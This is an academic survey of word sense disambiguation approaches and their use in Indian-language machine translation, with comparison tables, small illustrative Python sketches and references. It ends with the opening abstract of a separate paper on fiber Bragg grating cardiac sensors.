The ambiguity issue is an open challenge in the field of natural language processing (NLP), and WSD is the key task for solving it. WSD is crucial for several real-life applications such as machine translation (MT), information extraction (IE), information retrieval (IR), and speech recognition (SR).
Machine translation (MT) has been one of the most significant applications of WSD techniques. Machine translation [1] is the process whereby text in one language is converted into another language. The first language is referred to as the source language, while the second is referred to as the target language. Natural languages appear as written texts and as speech data; both text and spoken input can be translated from the source language into the target language using machine translation (MT).
Ambiguity refers to the presence in a sentence of words that have more than one meaning or interpretation. From a study of various works on ambiguity, we found that ambiguity in language can be classified into five broad categories, which are shown in Fig. 1. Detailed information on the various types of ambiguity, with examples and explanations, is outlined in Table 1.
[Fig. 1: Classification of ambiguity into five broad types, with applications of disambiguation techniques]
[Figure: Alternative parse trees for "Train leaves at 2 p.m.", attaching "leaves" either as a noun (NP) or as a verb (VP)]
Word sense disambiguation (WSD) is the task of selecting, by considering its context, the best sense of an ambiguous word (a word with multiple meanings) in a particular use of that word. WSD is viewed as an AI-complete problem, i.e., a task whose solution must be at least as complex as the most demanding problems in artificial intelligence [5]. This problem must therefore be solved during translation from the source language to the target language. The technique of finding the exact meaning of an ambiguous word [5, 6] from a predefined set of senses is word sense disambiguation (WSD).
Table 1 (continued)

S. No.: 5
Ambiguity type: Parts-of-speech (POS) ambiguity
Definition: The same word form can act as a noun or a verb, as plural or singular, and so on [4]
Example: "The red leaves are very shiny" and "The train leaves at 2 p.m."
Explanation: In the first sentence, "leaves" means "leaves of a tree" and is a noun; in the second, "leaves" means "departs" and is a verb. The same word can therefore be labeled as a different part of speech in different sentences.
The remainder of the paper is organized as follows:
Section 3 provides a comparative analysis of related WSD work and directions for future research.
Section 4 describes our proposed work.
Section 5 discusses the different approaches to WSD in detail.
Section 6 presents a summary of WSD approaches and algorithms, with their benefits and drawbacks, in Table 2.
Section 7 reviews the literature on the WSD approaches used by researchers for various Indian languages; their comparative analysis, along with reported accuracy percentages, is presented in Table 3.
Section 8 concludes the paper.
A considerable amount of work has been done on WSD; some studies report the precision of the numerous strategies used in different languages, and a few give surveys of WSD approaches. On the basis of the techniques used, and of the different knowledge sources used in disambiguation, classifications of WSD algorithms have been given [8]. WSD surveys have been conducted by various researchers, providing comprehensive reports on algorithms and methods for solving the ambiguity problem in a particular language. A brief analysis of WSD-based work done by these investigators, their conclusions, and the scope for future research is presented below:
(a) A novel context-clustering scheme is presented within a Bayesian framework. The algorithm is based on the similarities between context pairs. A Maximum Entropy model is then trained to represent the probability distribution of context-pair similarities based on heterogeneous features [9].
(b) A Naïve Bayesian supervised learning method with rich features. A Forward Sequential Selection algorithm is used to choose the best set of features, and high accuracy is obtained with this method. Part-of-speech information can be examined to determine whether it is useful in cases where sufficient training data are not available [10].
(c) A hybrid training method is used for better performance than either the supervised or the unsupervised approach alone. The unsupervised method gives 63% accuracy, the supervised method 76%, and the hybrid method 80%; the authors therefore conclude that accuracy is improved by the hybrid approach. They also note that when the target words are disambiguated correctly, the system gives a 100% accuracy result [11].
(d) An unsupervised graph-based approach is used. After processing a sentence, it finds the ambiguous words and creates a virtual graph over the context vectors. Similarity can then be calculated from the labeled nodes of the graph, and on the basis of
Table 2 Comparison analysis of WSD algorithms and approaches with respect to their benefits and drawbacks

Knowledge-based approach:
- Lesk algorithm. Benefits: the improved Lesk algorithm is much quicker than the original Lesk algorithm and has a lower computational complexity. Drawbacks: it requires massive knowledge sources, and the original method can rarely be used in practice.
- Semantic similarity. Benefits: the words with the smallest distance between them are semantically related. Drawbacks: when the uniform-distance problem arises, any two concepts on paths of the same length have the same semantic similarity.
- Selectional preferences. Benefits: reduces the heavy human time cost of manual tagging. Drawbacks: the grammatical relationship between selected words or phrases can be hard to establish.
- Heuristic method. Benefits: potential issues can be examined after conducting usability testing. Drawbacks: it requires knowledge as well as experience, and it is more expensive for designers.

Supervised approach:
- Decision list. Benefits: produces the best results, since it can be used in a series of experiments to arrive at the desired outcome. Drawbacks: overfitting occurs, i.e., errors appear when a function fits too closely to a limited set of data points.
- Decision tree. Benefits: an effective method that is easy to understand. Drawbacks: maintenance is a complicated and difficult task.
- Naïve Bayes. Benefits: very simple, easy to implement, and very fast; requires only a small amount of training data to calculate the probability likelihoods. Drawbacks: problems occur owing to a lack of data.
- Neural network. Benefits: able to work with incomplete knowledge. Drawbacks: hardware dependent, and requires a parallel processing unit.
- Example-based method. Benefits: develops a long-term knowledge-holding system. Drawbacks: poor potential performance.
- Support vector machine (SVM). Benefits: uses the kernel trick, and the regularization parameter reduces the over-fitting problem. Drawbacks: lack of transparency of results.

Unsupervised approach:
- Context clustering/word clustering. Benefits: can be used without any prior experience as a basis and without developing corpora. Drawbacks: the issue of selecting suitable document features to use in clustering.
- Co-occurrence graph. Benefits: robust features can be generated by assembling small features. Drawbacks: bookmarks cannot be included.
the similarity values, a sense label can be selected. This is a new approach for Indian languages and can be applied to them for better accuracy and adaptability [12].
(e) For the purpose of disambiguation, a topic model is used. The most basic example of a topic model is Latent Dirichlet Allocation (LDA), which rests on the key hypothesis that every document deals with a number of topics. A probabilistic graphical model is presented; because it scales linearly with the number of terms in the context, the system can use the entire document as the context for disambiguation. It outperforms leading knowledge-based WSD systems on a set of benchmark datasets, and the model may also be used for the supervised WSD method [13].
(f) A detailed survey report is presented on various WSD approaches and their benefits and drawbacks. These approaches have been implemented successfully in many languages. The authors conclude that a successful WSD algorithm can be built by considering the following factors: neighbors of a word tend to share the same sense; some approaches always run quickly but with accuracy limitations; and the majority of those approaches have been implemented successfully for a variety of languages [14].
(g) A knowledge-based WSD approach is used whose framework has only four components: relation extraction, similarity calculation, semantic space exploration, and, finally, semantic path exploration. This method outperforms all other schemes on the other three datasets, and it performs well on nouns and verbs, the main components of any sentence, in terms of POS disambiguation. Its noun disambiguation equals the best supervised method in performance, and its verb disambiguation is superior to all other knowledge-based systems [15].
(h) Dynamic programming is used to solve the classifier-ensemble pruning problem by breaking it down into a series of smaller problems, and dynamic programming (DP) is used to find
Table 3 Summary of WSD techniques used in different Indian languages with accuracy percentage

- Knowledge-based approach, Haroon [38], 2010, Malayalam: 81.3%
- Modified Lesk's algorithm, Kumar and Khanna [39], 2011, Punjabi: 75%
- Unsupervised learning method with graph-based approach, Das and Sarkar [40], 2013, Bengali: 60%
- Decision list, Parameswarappa et al. [41], 2013, Kannada: satisfactory
- Genetic algorithm, Kumari and Singh [42], 2013, Hindi: 91.6%
- Decision-tree-based WSD system, Singh et al. [27], 2014, Manipuri: 71.75%
- Support vector machine, Anand Kumar et al. [43], 2014, Tamil: 91.6%
- Naïve Bayes classification, Pal et al. [44], 2015, Bengali: 80–85%
- Context-similarity unsupervised approach, Sankar et al. [45], 2016, Malayalam: 72%
- Genetic algorithm, Vaishnav [46], 2017, Gujarati: satisfactory
- Lesk algorithm, Shashank and Kallimani [47], 2017, Kannada: satisfactory
- Naïve Bayes method, pal Singh and Kumar [48], 2018, Punjabi: 81–89% for both models
- Naïve Bayes approach, Borah et al. [49], 2019, Assamese: 91.11%
- Knowledge-based approach, Vaishnav and Sajja [50], 2019, Gujarati: satisfactory
- Deep learning neural network, pal Singh and Kumar [51], 2020, Punjabi: 91–97%
the optimal subset that contains the most distinct set in the shortest amount of time, while maintaining the same or better accuracy than the original set. This algorithm can be used with any ensemble approach and on real-world examples; DPED can even be integrated with bagging and boosting algorithms to enhance efficiency on big data sets and multi-class problems [16].
(i) A conceptual framework is created that is built on the likelihood of events of different natures and their potential effects. The conceptual analysis can be applied in various other case studies consisting of multiple sources; since taking full advantage of such sources is very difficult, a quantitative review technique would help to enhance it. Further advancement is justified by the association between the scale of perception and taxonomy and management. Relevant sources can be weighted by assigning weights to different interpretations on the basis of scenario reliability [17].
(j) SensEmBERT is an effective method for both English and multilingual WSD tasks. Going forward, the authors will work to cover further POS tags (verbs, adjectives, and adverbs) by tapping into other sources of knowledge. Sense embeddings can also be used to create high-quality silver data for WSD in multiple languages [18].
(k) The authors presented ARES, a semi-supervised approach for producing sense embeddings in English and across different languages, evaluated on tasks including Word in Context (WiC). ARES couples the information within sense-annotated corpora with corpora created automatically by means of a cluster-based algorithm, resulting in high-quality latent representations of the concepts within a lexical knowledge base. Going forward, they will apply the information captured by these embeddings to other downstream tasks in multilingual semantics and cross-lingual semantic parsing [19].
4 Proposed Work
We inferred from this comparative evaluation that such algorithms can be applied to multiple languages and to various datasets of different sizes. WSD experiments have been implemented in only a few Indian languages, such as Hindi, Marathi, Gujarati, Bengali, Punjabi, and Kannada. Our approach aims to provide a better solution for parts-of-speech (POS) ambiguity in English-to-Sanskrit machine translation [20] using a supervised learning method.
Example
1. Train leaves at two p.m. (a verb)
2. Leaves are falling from the tree. (a noun)
The parse tree for the sentence "Train leaves at 2 p.m." is presented in the figure; it admits two cases.
The sentence is grammatically correct, but during morphological analysis the system faces ambiguity in treating "leaves" as a noun or a verb, given the information provided by the bilingual lexicon/dictionary. Morphological analysis is a method for identifying and investigating the total set of possible relationships contained in a word list and for selecting the most appropriate word from the entire list of possibilities.
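The ambiguity described above can be illustrated with a toy rule that inspects the left neighbour of "leaves"; a real system would use a trained POS tagger together with the bilingual lexicon, and the word lists below are invented for illustration only:

```python
# Hedged sketch: disambiguate the POS of "leaves" from its left neighbour.
# The subject word list is an invented toy; a real tagger is trained.
def tag_leaves(sentence):
    words = sentence.lower().replace(".", "").split()
    i = words.index("leaves")
    if i > 0 and words[i - 1] in {"train", "he", "she", "bus"}:
        return "VERB"   # a likely subject precedes it, e.g. "train leaves"
    return "NOUN"       # e.g. sentence-initial or after a determiner

print(tag_leaves("Train leaves at two p.m."))        # a verb
print(tag_leaves("Leaves are falling from the tree."))  # a noun
```

This mirrors the two example sentences above: the same surface form receives different tags depending on its context.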
5 WSD Approaches
There are several approaches to WSD, but mainly three, depending on the availability of datasets. These approaches are shown in Fig. 4.
Knowledge-Based Approach

This approach is based on several sources of knowledge, such as machine-readable dictionaries, thesauri, and sense inventories. The dictionary most commonly used in this research field is WordNet [21]. The following knowledge-based methods are popular.
(a) Lesk Algorithm: The Lesk algorithm is a dictionary-based method introduced by Michael Lesk in 1986 [22, 23]. It identifies the correct sense one word at a time, determining the correct definition of each word in context by using gloss overlap: the chosen sense is the one whose dictionary definition shares the most words with the context. Simplified variants run faster, reducing the computational time complexity.
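The gloss-overlap idea can be sketched in a few lines. The two-sense inventory for "bank" below is a hand-made toy; a real system would draw glosses from WordNet (e.g. via NLTK's `nltk.wsd.lesk`):

```python
# Minimal sketch of simplified Lesk: score each sense by the overlap
# between its gloss and the context words. The inventory is invented.
TOY_SENSES = {
    "bank": {
        "bank#1": "sloping land beside a body of water such as a river",
        "bank#2": "financial institution that accepts deposits and lends money",
    },
}

def simplified_lesk(word, context):
    context_words = set(context.lower().split())
    best_sense, best_overlap = None, -1
    for sense, gloss in TOY_SENSES[word].items():
        overlap = len(context_words & set(gloss.split()))
        if overlap > best_overlap:
            best_sense, best_overlap = sense, overlap
    return best_sense

print(simplified_lesk("bank", "he sat on the bank of the river and fished"))
# -> bank#1: its gloss shares more words with the context than bank#2's
```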
(b) Semantic Similarity: This knowledge-based method resolves the WSD problem by quantifying the relationship between words [14]. Semantic similarity can be used to quantify uncertainty, as well as to check patterns for continuity and coherence [24]. All measures fall under four categories: information content, feature-based, path-length, and hybrid measures.
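As an illustration of the path-length family of measures, the sketch below computes similarity as 1/(1 + path length) over a tiny invented is-a hierarchy; WordNet-based tools apply the same idea to a full taxonomy:

```python
# Hedged sketch: path-length similarity on an invented hypernym tree.
PARENT = {  # child -> hypernym (is-a)
    "dog": "canine", "wolf": "canine", "canine": "mammal",
    "cat": "feline", "feline": "mammal", "mammal": "animal",
}

def ancestors(node):
    chain = [node]
    while node in PARENT:
        node = PARENT[node]
        chain.append(node)
    return chain

def path_similarity(a, b):
    """1 / (1 + number of edges on the shortest is-a path between a and b)."""
    chain_a, chain_b = ancestors(a), ancestors(b)
    lca = next(n for n in chain_a if n in chain_b)  # lowest common ancestor
    dist = chain_a.index(lca) + chain_b.index(lca)
    return 1.0 / (1.0 + dist)

print(path_similarity("dog", "wolf"))  # two edges via "canine"
print(path_similarity("dog", "cat"))   # four edges via "mammal": less similar
```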
(c) Selectional Preferences: This method uses information about the likely relationships between different categories of words, and it denotes the familiar sense on the basis of the source of information. These preferences are given in terms of semantic classes rather than individual words.
(d) Heuristic Method: This knowledge-based method uses linguistic properties to determine the correct meaning of an ambiguous expression. Three heuristics are used in WSD systems. Most Frequent Sense considers all possible meanings of a given ambiguous expression; a word's most frequent sense (MFS) can be measured in a variety of ways, and WordNet provides a frequency count for each of a word's senses. One Sense per Discourse states that a word's meaning is preserved across all its occurrences in a given text; it affects classification likelihood and can be overridden when there is good local evidence. One Sense per Collocation is similar to One Sense per Discourse, except that it assumes nearby words offer stronger and clearer signals about a word's sense.
(e) Walker's Algorithm: This algorithm is based on a thesaurus. It finds the thesaurus categories associated with the senses of an ambiguous word and computes a score for each sense: the score is incremented by 1 for each context word that falls under the same thesaurus category as that sense. The sense with the highest score is chosen; the method's strength lies in its reliance on thesaurus synonym groups.
Supervised Approach

This approach covers WSD systems that use machine-learning techniques to learn from manually sense-annotated data. A classifier learns from the training set and is then used to tag the target words; the sense tags in the training data are generated manually using a dictionary. In contrast to the other approaches, this one shows the best results. It uses the following methods:
(a) Decision List: A decision list is an ordered set of "if-then-else" rules [25–27]. Training sets are used to generate parameters such as feature values, senses, and scores; ordering the rules by decreasing score yields the final decision list. First, the occurrences of a word are counted, and its feature vector is used in creating the decision list; the first rule that matches the context determines the sense. An example is a decision list that determines whether a person is eligible for blood donation.
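The "highest-scoring matching rule wins" behaviour can be sketched as follows; the rules and scores below are illustrative, not learned from a corpus:

```python
# Hedged sketch of a decision list: (feature, sense, score) rules are
# sorted by decreasing score; the first matching rule decides the sense.
RULES = sorted([
    ("river", "bank#1", 4.2),
    ("money", "bank#2", 3.9),
    ("fish",  "bank#1", 2.1),
    ("loan",  "bank#2", 1.8),
], key=lambda r: -r[2])

def decision_list(context_words, default="bank#2"):
    for feature, sense, _score in RULES:
        if feature in context_words:
            return sense
    return default  # back off to the most frequent sense

# "fish" (score 2.1) outranks "loan" (1.8), so bank#1 is chosen:
print(decision_list({"went", "fishing", "fish", "loan"}))
```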
(b) Decision Tree: A decision tree is a visual representation of the outcomes of a sequence of connected choices. It allows a person to compare potential actions using a yes-no tree based on characteristics such as costs, probabilities, and benefits. Classification rules are represented using a decision tree [28–30], and these rules recursively partition the training data set.
Figure 5 shows an example of a decision tree used to determine a person's eligibility for blood donation.
(iii) Naïve Bayes: This probabilistic method selects the most probable sense of a word given its context features. The probability value P can be computed with the following formula:

S* = argmax over S_i of  P(S_i) ∏_{j=1}^{x} P(f_j | S_i)

where S_i is a sense of a word w, f_j is a given feature, and x is the total number of extracted features.
This model is simple to use and implement, especially with large data sets.
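A counting implementation of this idea, with add-one smoothing so unseen features do not zero out the product, might look as follows; the four training sentences are invented toy data:

```python
# Hedged Naive Bayes WSD sketch: prior * product of smoothed likelihoods.
from collections import Counter

TRAIN = [
    ("bank#1", "he fished from the river bank"),
    ("bank#1", "grass grew on the river bank"),
    ("bank#2", "the bank approved the loan"),
    ("bank#2", "deposit money at the bank"),
]

sense_count = Counter(s for s, _ in TRAIN)
feat_count = {s: Counter() for s in sense_count}
for sense, text in TRAIN:
    feat_count[sense].update(text.split())
vocab = {w for _, text in TRAIN for w in text.split()}

def classify(context):
    best, best_p = None, 0.0
    for sense, n in sense_count.items():
        p = n / len(TRAIN)                        # prior P(S_i)
        total = sum(feat_count[sense].values())
        for f in context.split():                 # likelihood product
            p *= (feat_count[sense][f] + 1) / (total + len(vocab))
        if p > best_p:
            best, best_p = sense, p
    return best

print(classify("a loan from the bank"))  # financial sense scores higher
```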
(iv) Neural Networks: Artificial neurons are used to process data in this model [34–37]. The training data set is partitioned into non-overlapping sets, with inputs in the form of feature pairs. The connection weights arising from the new pairs are adjusted to obtain the desired performance. In neural networks, words are interpreted as nodes, and these nodes trigger semantically linked concepts.
The following formula [38] can be used to calculate the net input of the general artificial neuron model:

y_in = Σ_{i=1}^{n} x_i w_i

where the x_i are the inputs and the w_i the connection weights. The result is determined by applying the activation function F to the total input value:

y = F(y_in) (6)
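A single artificial neuron illustrates this computation: the net input is the weighted sum of the inputs, and a step function serves as the activation F. The weights and threshold below are illustrative, not trained:

```python
# Hedged sketch of one neuron: weighted-sum input, then step activation.
def neuron_output(xs, ws, threshold=0.5):
    y_in = sum(x * w for x, w in zip(xs, ws))   # net input: sum of x_i * w_i
    return 1 if y_in >= threshold else 0        # activation y = F(y_in)

print(neuron_output([1, 0, 1], [0.4, 0.9, 0.3]))  # 0.4 + 0.3 = 0.7 -> fires
```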
(v) Example-Based Learning: All training examples are stored in memory, and new examples are added to the model; classification is based on this stored memory. The K-nearest neighbor (KNN) method is the most widely used method of this kind. KNN uses feature similarity to predict the values of new data points: a new data point is assigned a sense on the basis of how closely it matches the points in the training set.
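A KNN sketch for WSD, using word overlap as the (inverse) distance between contexts and a majority vote over the k nearest labelled examples; the example contexts are invented:

```python
# Hedged KNN-WSD sketch: nearest neighbours by shared context words.
from collections import Counter

EXAMPLES = [
    (("river", "water", "bank"), "bank#1"),
    (("fish", "river", "bank"), "bank#1"),
    (("money", "loan", "bank"), "bank#2"),
    (("deposit", "money", "bank"), "bank#2"),
    (("bank", "account", "money"), "bank#2"),
]

def overlap_distance(a, b):
    return -len(set(a) & set(b))  # more shared words = "closer"

def knn(context, k=3):
    ranked = sorted(EXAMPLES, key=lambda ex: overlap_distance(context, ex[0]))
    votes = Counter(sense for _, sense in ranked[:k])
    return votes.most_common(1)[0][0]  # majority sense of the k nearest

print(knn(("money", "bank", "account")))  # nearest examples are financial
```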
(vi) Support Vector Machine (SVM): The SVM-based methodology is built on the structural risk minimization principle of statistical learning theory. The main objective of this strategy is to separate positive and negative examples with the largest possible margin, where the margin is the distance between the hyperplane and the nearest positive or negative example. The examples of both kinds that lie closest to the hyperplane are called support vectors.
Unsupervised Approach

According to [39], these algorithms do not necessarily require a training corpus or considerable computation time, since unlabeled data can easily be obtained automatically. The following three methods come under this category:
(a) Context Clustering: This method depends on grouping techniques; groups are formed on the basis of a similarity matrix over context vectors. The resulting groups, called clusters, are used to determine the meaning of a word. The technique can be applied when there is no class to be predicted but the inputs can be divided into natural groups.
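A minimal sketch of the idea: occurrences are grouped by the cosine similarity of their bag-of-words context vectors, with a single-pass threshold rule standing in for a full clustering algorithm. The 0.5 threshold and the sentences are illustrative:

```python
# Hedged context-clustering sketch: cosine similarity over word counts.
import math
from collections import Counter

def cosine(a, b):
    dot = sum(a[w] * b[w] for w in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb)

def cluster(contexts, threshold=0.5):
    clusters = []  # each cluster's first member serves as a centroid proxy
    for text in contexts:
        vec = Counter(text.split())
        for c in clusters:
            if cosine(vec, c[0]) >= threshold:
                c.append(vec)
                break
        else:
            clusters.append([vec])
    return clusters

docs = ["river bank water", "water near the river bank",
        "bank loan money", "money in the bank loan"]
print(len(cluster(docs)))  # the two senses of "bank" form two clusters
```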
(b) Word Clustering: In this technique, words are clustered together on the basis of their semantic similarity. The similarity of words can be calculated from the features they share; highly similar words in a cluster have the same sort of characteristics. Applying a clustering algorithm then makes it possible to distinguish between senses.
(c) Co-occurrence Graph: This graph-based method builds a virtual graph over the context vectors after finding the polysemous words through sentence processing. The graph's nodes are used to calculate similarity; a consistent value is then determined from these measurements, and a sense label is assigned on the basis of the context.
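The graph construction step can be sketched as follows: nodes are words, and an edge links any two words occurring in the same sentence. The two invented sentences give "bank" neighbours from both of its senses:

```python
# Hedged co-occurrence graph sketch: same-sentence words become neighbours.
from itertools import combinations
from collections import defaultdict

def build_graph(sentences):
    graph = defaultdict(set)
    for s in sentences:
        for a, b in combinations(set(s.split()), 2):
            graph[a].add(b)
            graph[b].add(a)
    return graph

g = build_graph(["bank river water", "bank loan money"])
print(sorted(g["bank"]))       # neighbours from both senses of "bank"
print("river" in g["loan"])    # the two sense neighbourhoods stay apart
```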
6 Summary of WSD Approaches and Algorithms

After the detailed study of WSD approaches, we present a summary of the benefits and drawbacks of the different types of algorithms in Table 2.
7 WSD in Indian Languages: A Comparative Analysis

Numerous disambiguation methods have been implemented for English and other European languages, but less work has been done for Indian languages owing to the lack of resources, such as machine-readable dictionaries and knowledge sources, that WSD algorithms require. The literature on work carried out in various Indian languages is presented here in the form of a comparative analysis: Table 3 gives a detailed analysis of the WSD algorithms applied to several Indian languages by various researchers, together with their reported accuracies.
8 Conclusion
Due to the complexity of the words in a specific language and the dependence on unstructured sources, disambiguation, that is, capturing the precise meaning of a word in a particular document, is a difficult task. In this manuscript we have included a thorough analysis of the advantages and disadvantages of different approaches to word sense disambiguation (WSD). We also discussed the different methods used by researchers in Indian-language machine translation research, as well as the accuracy of their findings. We came to the conclusion that there are three methodologies, supervised, unsupervised, and knowledge-based, with the supervised approach providing the best performance.
Finally, we determine that a given system may yield a high degree of precision for one language but a low one for another; that the characteristics of the data set used influence the performance of the applied algorithm; that some of these techniques run quickly but with accuracy constraints; and that most of these strategies have been implemented successfully for several languages.
In our research work, we will apply supervised learning methods to disambiguate part-of-speech ambiguity in the source language, i.e., English, during machine translation from English to Sanskrit. We are focusing on translating documents in the source language, English, into the target language, Sanskrit, with the maximum success rate.
References
1. Bahadur, P., & Chauhan, D. S. (2014). Machine translation—A journey. In 2014 Science and
information conference (pp. 187–195). IEEE.
2. Dayal, V. (2004). The universal force of free choice any. Linguistic Variation Yearbook, 4, 15–40. Retrieved from http://www.ingentaconnect.com
3. Cruse, D. (1986). Lexical semantics. Introducing lexical relations. Cambridge: Cambridge
University Press.
4. Zalta, E. N. (2014). Ambiguity. In Stanford encyclopedia of philosophy. Retrieved from http://plato.stanford.edu
5. Navigli, R. (2009). Word sense disambiguation: A survey. ACM Computing Surveys (CSUR),
41(2), 1–69.
6. Lin, D., and Pantel, P. (2002). Discovering word senses from text. In ACM
7. Ranjan Pal, A., & Saha, D. (2015). Word sense disambiguation: A survey. International Journal
of Control Theory and Computer Modeling, 5(3), 1–16. https://doi.org/10.5121/ijctcm.2015.
5301
8. Haroon, R. P. (2011). Word sense disambiguation-A survey. In Proceedings of the international
colloquiums on computer electronics Electrical Mechanical and Civil, (EMC’ 11), ACEEE (pp
58–60). DOI: 02.CEMC.2011.01.582
9. Niu, C., Li, W., Srihari, R. K., Li, H., & Crist, L. (2004). Context clustering for word sense
disambiguation based on modeling pairwise context similarities. In Proceedings of SENSEVAL-
3, the third international workshop on the evaluation of systems for the semantic analysis of
text (pp. 187–190).
10. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features. In Proceedings of the 18th Pacific Asia conference on language, information and
computation (pp. 105–114).
11. Saktel, P., & Shrawankar, U. (2013). An improved approach for word ambiguity removal. arXiv
preprint arXiv:1304.7282.
12. Sheth, M., Popat, S., & Vyas, T. (2016). Word sense disambiguation for Indian languages. In
International conference on emerging research in computing, information, communication and
applications (pp. 583–593). Springer, Singapore.
13. Chaplot, D. S., & Salakhutdinov, R. (2018). Knowledge-based word sense disambiguation
using topic models. In Proceedings of the AAAI conference on artificial intelligence (Vol. 32,
No. 1).
14. Aliwy, A. H., & Taher, H. A. (2019). Word sense disambiguation: Survey study. Journal of
Computer Science. Accepted July 2019, Iraq.
15. Wang, Y., Wang, M., & Fujita, H. (2020). Word sense disambiguation: A comprehensive
knowledge exploitation framework. Knowledge-Based Systems, 190, 105030.
16. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107.
17. Gaudard, L., & Romerio, F. (2020). A conceptual framework to classify and manage risk,
uncertainty and ambiguity: An application to energy policy. Energies, 13(6), 1422.
18. Scarlini, B., Pasini, T., & Navigli, R. (2020). SensEmBERT: Context-enhanced sense embed-
dings for multilingual word sense disambiguation. In Proceedings of the AAAI conference on
artificial intelligence (Vol. 34, No. 05, pp. 8758–8765).
19. Scarlini, B., Pasini, T., & Navigli, R. (2020). With more contexts comes better performance:
Contextualized sense embeddings for all-round word sense disambiguation. In Proceedings
of the 2020 conference on Empirical Methods in Natural Language Processing (EMNLP)
(pp. 3528–3539).
20. Bahadur, P. (2013). English to Sanskrit machine translation-EtranS system. International
Journal of Computer Applications & Information Technology, 3(II) (ISSN: 2278–7720).
21. Banerjee, S., and Pedersen, T. (2002). An adapted Lesk algorithm for word sense disambigua-
tion using WordNet. In Proceedings of the third international conference on intelligent text
processing and computational linguistics, Mexico City, February.
22. Lesk, M. (1986). Automatic sense disambiguation using machine readable dictionaries: How
to tell a pine cone from an ice cream cone. In Proceedings of SIGDOC.
23. Jiang, J. J., & Conrath, D. W. (1997). Semantic similarity based on corpus statistics and lexical
taxonomy. In Proceedings of the 10th research on computational linguistics international
conference (pp. 19–33) 5–7 Aug, Taipei, Taiwan.
24. http://link.springer.com/article/10.1023/A%3A1002674829964#page-1
25. Parameswarappa, S., & Narayana, V. N. (2013). Kannada word sense disambiguation using
decision list. 2(3), 272–278
26. http://www.academia.edu/5135515/Decision_List_Algorithm_for_WSD_for_Telugu_NLP
27. Singh, R. L., Ghosh, K., Nongmeikapam, K., & Bandyopadhyay, S. (2014). A decision tree
based word sense disambiguation system in Manipuri language. Advanced Computing: An
International Journal (ACIJ), 5(4), 17–22.
28. http://wing.comp.nus.edu.sg/publications/theses/2011/low_wee_urop.pdf
29. http://www.d.umn.edu/~tpederse/Pubs/naacl01.pdf
30. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features. In PACLIC 18 (pp. 105–114), 8th–10th Dec 2004, Waseda University, Tokyo.
31. http://www.cs.upc.edu/~escudero/wsd/00-ecai.pdf
32. Aung, N. T. T., Soe, K. M., & Thein, N. L. (2011). A word sense disambiguation system
using Naïve Bayesian algorithm for Myanmar language. International Journal of Scientific &
Engineering Research, 2(9), 1–7.
33. http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.13.9418&rep=rep1&type=pdf
34. http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.154.3476&rep=rep1&type=pdf
35. http://www.aclweb.org/anthology/W02-1606
36. http://www.cs.cmu.edu/~maheshj/pubs/joshi+pedersen+maclin.iicai2005.pdf date:
14/05/2015
37. Erkan, G., & Radev, D. (2004). Lexrank: graph based lexical. Artificial Intelligence Research,
22, 457–479.
38. Haroon, R. P. (2010). Malayalam word sense disambiguation. In 2010 IEEE international
conference on computational intelligence and computing research (pp. 1–4). IEEE.
39. Kumar, R., & Khanna, R. (2011). Natural language engineering: The study of word sense
disambiguation in Punjabi. Research Cell: An International Journal of Engineering Sciences,
1, 230–238. ISSN: 2229–6913.
40. Das, A., & Sarkar, S. (2013). Word sense disambiguation in Bengali applied to Bengali-Hindi
machine translation. In Proceedings of the 10th International Conference on Natural Language
Processing (ICON), Noida, India.
41. Parameswarappa, S., Narayana, V. N., & Yarowsky, D. (2013). Kannada word sense disam-
biguation using decision list. International Journal of Emerging Trends & Technology in
Computer Science (IJETTCS), 2(3), 272–278.
42. Kumari, S., & Singh, P. (2013). Optimized word sense disambiguation in Hindi using genetic algorithm. International Journal of Research in Computer & Communication Technology, 2(7), 445–449.
43. Anand Kumar, M., Rajendran, S., & Soman, K. P. (2014). Tamil word sense disambiguation
using support vector machines with rich features. International Journal of Applied Engineering
Research, 9(20), 7609–7620.
44. Pal, A. R., Saha, D., Naskar, S., & Dash, N. S. (2015). Word sense disambiguation in Bengali:
A lemmatized system increases the accuracy of the result. In 2015 IEEE 2nd international
conference on recent trends in information systems (ReTIS) (pp. 342–346). IEEE.
45. Sankar, K. S., Raj, P. R., & Jayan, V. (2016). Unsupervised approach to word sense
disambiguation in Malayalam. Procedia Technology, 24, 1507–1513.
46. Vaishnav, Z. B. (2017). Gujarati word sense disambiguation using genetic algorithm. Inter-
national Journal on Recent and Innovation Trends in Computing and Communication, 5(6),
635–639.
47. Shashank, N. S., & Kallimani, J. S. (2017). Word sense disambiguation of polysemy
words in kannada language. In 2017 International Conference on Advances in Computing,
Communications and Informatics (ICACCI) (pp. 641–644). IEEE.
48. pal Singh, V., & Kumar, P. (2018). Naive Bayes classifier for word sense disambiguation of
Punjabi language. Malaysian Journal of Computer Science, 31(3).
49. Borah, P. P., Talukdar, G., Baruah, A. (2019) WSD for assamese language. In J. Kalita, V. Balas,
S. Borah, & R. Pradhan (Eds.), Recent developments in machine learning and data analytics.
Advances in intelligent systems and computing (Vol. 740). Springer, Singapore. https://doi.org/
10.1007/978-981-13-1280-9_11
50. Vaishnav, Z. B., & Sajja, P. S. (2019). Knowledge-based approach for word sense disambigua-
tion using genetic algorithm for Gujarati. In Information and communication technology for
intelligent systems (pp. 485–494). Springer, Singapore.
51. pal Singh, V., & Kumar, P. (2020). Word sense disambiguation for Punjabi language using deep
learning techniques. Neural Computing and Applications, 32(8), 2963–2973.
Fiber Bragg Grating (FBG) Sensor
for the Monitoring of Cardiac
Parameters in Healthcare Facilities
Ambarish G. Mohapatra, Pradyumna Kumar Tripathy, Maitri Mohanty,
and Ashish Khanna
Abstract Fiber Bragg grating sensing technology provides a new outlook for healthcare monitoring systems owing to its spectral encoding capability, dielectric nature, high sensitivity, inertness, nontoxicity, immunity to the electromagnetic environment, self-referencing capability, and low cost. This article presents the design and construction of an FBG sensor for the monitoring of cardiac vibrations. A sensor element is designed by
depositing polydimethylsiloxane (PDMS) polymer on the FBG sensing element. The
elastic and thermal properties of the sensor element are also discussed in this article.
The stress and strain distribution profile is addressed using finite element analysis
